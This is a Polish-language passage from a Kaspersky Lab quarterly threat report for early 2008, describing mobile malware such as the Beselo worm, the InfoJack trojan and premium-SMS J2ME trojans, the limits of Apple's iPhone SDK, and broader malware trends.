Symbian został zaatakowany przez najnowszego robaka z całkowicie nowej rodziny. Do tego momentu istniały dwa typy zagrożeń: Cabir, który rozprzestrzeniał się za pośrednictwem Bluetootha, oraz ComWar, który wykorzystywał do tego celu MMS-y. Naturalnie istniało kilka wariantów obu tych robaków.

Pod koniec grudnia do naszych antywirusowych baz danych dodaliśmy program, który na pierwszy rzut oka zdawał się być nowym klonem ComWara: ComWar.y. Jednak pojawienie się tego programu w styczniu w ruchu jednego z największych operatorów komórkowych skłoniło nas do dokładniejszego przyjrzenia się tej nowej próbce.

Analiza przeprowadzona przez jednego z naszych partnerów, fińską firmę F-Secure, pokazała, że w rzeczywistości szkodnik ten należał do zupełnie nowej rodziny, która nie miała nic wspólnego z ComWarem.

Robak ten, sklasyfikowany jako Worm.SymbOS.Beselo.a (Beselo.b zostal wykryty niedługo po nim) działa w bardzo podobny sposób do ComWara, stosując typowe dla tego rodzaju robaków podejście. Rozprzestrzenia się poprzez wysyłanie zainfekowanych plików SIS za pośrednictwem MMS-ów oraz Bluetootha. Po uruchomieniu na atakowanym urządzeniu robak zaczyna wysyłać swoje kopie do kontaktów znajdujących się w telefonie, jak również do wszystkich dostępnych urządzeń z komunikacją Bluetooth, które znalazły się w zasięgu.

Co w tym nowego? Fakt, że istnieje nowa, aktywna rodzina robaków dla urządzeń mobilnych (co wskazuje na istnienie aktywnych twórców wirusów) oraz występowanie tego robaka na wolności. Nowe warianty Beselo mogły spowodować poważne lokalne epidemie - coś podobnego miało miejsce wiosną zeszłego roku, gdy ofiarą hiszpańskiej modyfikacji robaka ComWar padło 115 000 użytkowników smartfonów.

Windows Mobile

Na wzmiankę zasługuje również pojawienie się nowego szkodliwego programu dla systemu Windows Mobile, który do tej pory nie stanowił głównego celu szkodliwych użytkowników. Jednak InfoJack, trojan, który został wykryty pod koniec lutego, jest interesujący z następujących powodów:

InfoJack.a

  1. atakuje system Windows Mobile
  2. został wykryty na wolności
  3. rozprzestrzenia się w Chinach
  4. kradnie dane

Jest to pierwszy szkodliwy kod atakujący system Windows Mobile, który został wykryty na wolności i spowodował znaczną liczbę infekcji. Kod rozprzestrzeniał się z chińskiej strony zawierającej szeroki wachlarz legalnego oprogramowania. Trojan ten został dodany do plików instalacyjnych produktów mobilnych, takich jak Google Maps i klienty gier. Właściciel strony, z której rozprzestrzeniał się trojan, oświadczył, że nie chciał zrobić niczego nielegalnego, zbierał jedynie informacje o użytkownikach strony w celu usprawnienia serwisu oraz analizy rynku mobilnych aplikacji.

Po przedostaniu się do systemu trojan próbuje wyłączyć mechanizm ochrony uniemożliwiający instalację aplikacji, które nie posiadają podpisu cyfrowego twórcy. Gdy zainfekowany smartfon zostanie podłączony do Internetu, InfoJack zaczyna wysyłać poufne informacje z urządzenia na stronę trojana. Informacje te obejmują numer seryjny urządzenia, informacje o systemie operacyjnym i zainstalowanych aplikacjach. Trojan może również bez wiedzy użytkownika pobierać na telefon dodatkowe pliki i uruchomić je - może to zrobić, ponieważ ochrona przed uruchomieniem niepodpisanych aplikacji została wyłączona.

Kilka dni później aktywność tej strony została wstrzymana prawdopodobnie w związku z dochodzeniem prowadzonym przez chińską policję.

Pisaliśmy już, co się może zdarzyć, gdy twórcy wirusów zainteresują się popularnymi serwisami (np. ataki na portal Orkut w Brazylii). Chiny bez wątpienia są światowym liderem pod względem tworzenia szkodliwego kodu; obecnie ponad 50% wszystkich nowych szkodliwych programów w naszych antywirusowych bazach danych powstało w Chinach. Do tej pory chińscy hakerzy atakowali użytkowników gier online wykorzystujących komputery osobiste. Jednak przypadek InfoJacka pokazuje, że możliwe jest zorganizowanie masowej epidemii i stworzenie mobilnych wirusów.

Chiny były pierwszym krajem, który zaatakował trojan dla systemu Windows Mobile. Całkiem możliwe, że autor InfoJacka nie chciał zrobić niczego nielegalnego. Teraz jednak, gdy fundament został już położony, tysiące chińskich hakerów, którzy tworzą wirusy dla komputerów osobistych, może go wykorzystywać.

J2ME

W pierwszym kwartale 2008 roku trojany dla J2ME (które działają na prawie każdym współczesnym urządzeniu mobilnym, nie tylko na smartfonach) zaczęły pojawiać się z przerażającą regularnością. W styczniu wykryliśmy Smarm.b, następnie Smarm.c oraz Swapi.a, a w marcu SMSFree.d.

Wszystkie te trojany zostały wykryte w Rosji i stosują tę samą metodę zarabiania pieniędzy na użytkownikach: wysyłanie wiadomości SMS na numery o podwyższonych opłatach. (Dochodzenie w sprawie podobnego trojana wysyłającego SMS-y, Vivera, które przeprowadziliśmy w zeszłym roku, pokazało, że w ciągu trzech dni autor trojana zdołał zarobić około 500 dolarów). Mimo wszystkich tych incydentów rosyjscy dostawcy zawartości mobilnej nadal zachowują anonimowość osób, które rejestrują numery o podwyższonej opłacie. W ten sposób twórców wirusów trudno jest postawić przed sądem: pojawienie się nowych wariantów szkodliwych programów oraz brak informacji o aresztowaniach wyraźnie potwierdza to.

Oprócz trojanów dla J2ME, o których pisaliśmy wcześniej, istnieją jeszcze inne dwa szkodliwe programy, które wysyłają wiadomość SMS, za którą pobierana jest opłata. Flocker.d i Flocker.e, które zostały napisane w języku Python i miały na celu atakowanie smartfonów, zostały wykryte w styczniu 2008 roku.

Szkodniki te wykorzystują tę samą metodę propagacji co InfoJack: rozprzestrzeniają się za pośrednictwem popularnych stron oferujących oprogramowanie dla telefonów komórkowych. Trojany te występują w przebraniu legalnych narzędzi lub są zintegrowane z innymi produktami.

iPhone

Sekcję dotyczącą mobilnych zagrożeń zakończymy informacjami dotyczącymi długo oczekiwanego wydarzenia: opublikowaniem w marcu SDK dla iPhone'a.

Sądziliśmy, że udostępnienie SDK spowoduje pojawienie się licznych szkodliwych programów dla iPhone'a. Jednak możliwości, jakie zapewnia otwarte SDK Apple'a, są bardzo ograniczone.

Apple poszedł śladem Symbiana: model tworzenia i dystrybucji programów dla iPhone'a opiera się na koncepcji "podpisanych" aplikacji. Główne ograniczenia zostały określone w umowie korzystania z SDK dla iPhone'a: "Żaden interpretowany kod nie może być pobrany i wykorzystany w aplikacji z wyjątkiem kodu, który jest interpretowany i uruchamiany przez API opublikowane przez firmę Apple oraz wbudowany do programu interpretującego. Aplikacja nie może sama instalować ani uruchamiać innego kodu wykonywalnego w żaden sposób, włączając bez ograniczeń wykorzystywanie architektury wtyczki, wywoływanie innych struktur, innych niż API".

Ograniczenia te nie tylko utrudniają życie twórców wirusów, ale również skutecznie wykluczają takie aplikacje jak Firefox, Opera i wiele gier, klientów IM oraz wiele innych użytecznych programów: aplikacji, które mogą stać się niezwykle popularne wśród użytkowników iPhone'a i które mogą rozszerzyć możliwości urządzenia.

Przez cztery dni od momentu opublikowania SDK pobrano ponad 100 000 razy. Wygląda na to, że tak duża liczba potencjalnych konstruktorów powinna doprowadzić do wzrostu liczby nowych aplikacji stworzonych przy pomocy SDK. Tak się jednak nie dzieje.

W sensie formalnym Apple spełnił swoją obietnicę, udostępniając SDK. Na razie jednak nie jest jasne, w jaki sposób krok ten wpłynie nawet na rozwój legalnego oprogramowania dla telefonów. Ograniczenia są zbyt duże i zbyt wiele funkcji w SDK pozostaje niedostępnych.

Drugim poważnym ograniczeniem jest to, że aplikacje stworzone przy użyciu SDK, mogą być dystrybuowane tylko za pośrednictwem sklepu internetowego firmy Apple. Tworzy to dużo dodatkowych barier, począwszy od liczby uprawnionych "producentów" (twórców), skończywszy na ograniczeniach geograficznych (tylko osoby za Stanów Zjednoczonych mogą uczestniczyć).

Jest oczywiste, że w tych warunkach nie będzie możliwe uruchomienie produktu antywirusowego dla iPhone'a - nie z powodów technicznych, ale z powodu problemów opisywanych poniżej.

Szacuje się, że 45% - 50% wszystkich sprzedanych urządzeń zostało "odblokowanych". Wszystkie te urządzenia mogą zostać zainfekowane przez dowolny szkodliwy program dla iPhone'a podczas pobierania przez użytkownika plików z wielu różnych nieoficjalnych źródeł. W żaden sposób nie można tego kontrolować: użytkownicy zmodyfikowanych telefonów nie są uprawnieni do oficjalnej pomocy technicznej, dlatego nie będziemy mogli zapewnić im żadnej ochrony antywirusowej.

W najbliższej przyszłości liczba osób wykorzystujących iPhone'y prawdopodobnie zrówna się z liczbą użytkowników smartfonów z systemem Symbian w 2004 roku - czyli wtedy, gdy pojawił się Cabir.

Wnioski

Wydarzenia z pierwszych trzech miesięcy 2008 roku pokazują, że okres technicznej stagnacji w krajobrazie zagrożeń dobiega końca.

W zeszłym roku opisywaliśmy mechanizm typu przenośnik taśmowy: proces, w którym generowane są liczne prymitywne programy naśladowcze, w których nie są implementowane nowe technologie wirusowe. Zjawisko to można wyjaśnić w następujący sposób: twórcy wirusów woleli stosować wypróbowane metody, ponieważ w tym czasie nawet stare i dobrze znane podejścia mogły przynieść zyski, jeżeli zostały zastosowane na skalę przemysłową.

Nastąpiła jednak znacząca zmiana kierunku, widoczna przede wszystkim w pojawieniu się pierwszej szkodliwej implementacji bootkita. Oprócz tego coraz częściej wykorzystywane są metody infekcji plików, często w połączeniu ze złożonymi technikami polimorficznymi. Należy również pamiętać, że twórcy wirusów zapożyczają pewne technologie że świata antywirusowego. Na przykład, wykryliśmy już szkodliwe programy, które w celu zwalczania rozwiązań antywirusowych poprzez usuwanie ich lub blokowanie zawierają wykrywanie sygnatur plików antywirusowych. Wcześniej twórcy wirusów ograniczali się do projektowania swoich tworów w taki sposób, aby szukały plików według nazwy.

Obecnie stare technologie są rewidowane i implementowane na nowych poziomach. Walka wirusów z rozwiązaniami antywirusowymi przesuwa się z poziomu oprogramowania na poziom sprzętu.

Chociaż nie można jeszcze powiedzieć, że wydarzenia z pierwszego kwartału 2008 roku tworzą określony trend, poruszone kwestie mogą mieć duży wpływ na całą branżę bezpieczeństwa informatycznego w najbliższej przyszłości.

Źródło:
Kaspersky Lab